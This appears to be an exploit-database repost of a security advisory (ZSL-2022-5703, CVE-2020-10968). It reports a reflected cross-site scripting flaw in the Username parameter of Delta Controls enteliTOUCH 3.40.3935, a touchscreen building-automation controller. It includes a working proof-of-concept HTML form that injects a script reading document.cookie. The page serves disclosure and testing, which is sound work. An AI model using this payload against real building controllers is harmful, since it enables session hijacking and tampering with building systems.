Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting

CVE Category Price Severity
CVE-2020-10968 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-17
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.176586 0.744226

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting
<!DOCTYPE html>
<head><title>enteliTouch XSS</title></head>

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)

Vendor: Delta Controls Inc.
Product web page:
Affected version: 3.40.3935

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.

Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.

Tested on: DELTA enteliTOUCH

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5703
Advisory URL:



<form action="" method="POST">
  <input type="hidden" name="userInfo" value="" />
  <input type="hidden" name="UL_SelectedOptionId" value="" />
  <input type="hidden" name="Username" value="&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;" />
  <input type="hidden" name="formAction" value="Delete" />
  <input type="submit" value="CSRF XSS Alert!" />


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum